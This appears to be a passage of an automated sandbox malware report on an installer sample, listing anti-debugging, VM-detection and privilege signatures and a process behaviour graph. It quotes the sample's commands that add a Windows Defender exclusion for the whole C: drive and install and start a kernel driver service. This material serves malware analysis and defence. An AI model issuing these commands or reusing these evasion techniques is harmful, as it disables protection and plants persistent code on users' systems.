Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA1AEC0 FindFirstFileA,FindClose, 6_2_6CA1AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00AF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00AF7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF9C60 GetSystemInfo, 10_2_00AF9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2107441291.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2107441291.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C8A3886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA30181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA30181
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00B757D0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA39D35 mov eax, dword ptr fs:[00000030h] 6_2_6CA39D35
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA39D66 mov eax, dword ptr fs:[00000030h] 6_2_6CA39D66
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA2F17D mov eax, dword ptr fs:[00000030h] 6_2_6CA2F17D
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA28CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CA28CBD
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA30181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA30181

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF7720 cpuid 6_2_6CAF7720
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AFAB2A GetSystemTimeAsFileTime, 10_2_00AFAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B90090 GetVersion, 10_2_00B90090
AV process strings found (often used to terminate AV products)
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2268261288.00000000015B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579778 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 88 96 Multi AV Scanner detection for submitted file 2->96 98 Found driver which could be used to inject code into processes 2->98 100 PE file contains section with special chars 2->100 102 2 other signatures 2->102 10 #U5b89#U88c5#U52a9#U624b_2.0.6.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 30 other processes 2->17 process3 file4 94 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, PE32 10->94 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.6.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 26 other processes 17->33 process5 file6 80 C:\Users\user\AppData\Local\...\update.vac, PE32 19->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->82 dropped 104 Adds a directory exclusion to Windows Defender 19->104 35 #U5b89#U88c5#U52a9#U624b_2.0.6.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 Conhost.exe 23->43         started        45 conhost.exe 25->45         started        47 conhost.exe 27->47         started        49 conhost.exe 29->49         started        51 conhost.exe 31->51         started        53 26 other processes 33->53 signatures7 process8 file9 84 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, PE32 35->84 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.6.tmp 4 16 35->55         started        106 Loading BitLocker PowerShell Module 38->106 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        63 conhost.exe 45->63         started        signatures10 process11 file12 86 C:\Users\user\AppData\Local\...\update.vac, PE32 55->86 dropped 88 C:\Program Files (x86)\...\trash (copy), PE32+ 55->88 dropped 90 C:\Program Files (x86)\...\is-0F5J3.tmp, PE32+ 55->90 dropped 92 3 other files (1 malicious) 55->92 dropped 108 Query firmware table information (likely to detect VMs) 55->108 110 Protects its processes via BreakOnTermination flag 55->110 112 Hides threads from debuggers 55->112 114 Contains functionality to hide a thread from the debugger 55->114 65 7zr.exe 2 55->65         started        68 7zr.exe 6 55->68         started        70 cmd.exe 55->70         started        signatures13 process14 file15 78 C:\Program Files (x86)\...\tProtect.dll, PE32+ 65->78 dropped 72 conhost.exe 65->72         started        74 conhost.exe 68->74         started        76 sc.exe 70->76         started        process16
No contacted IP infos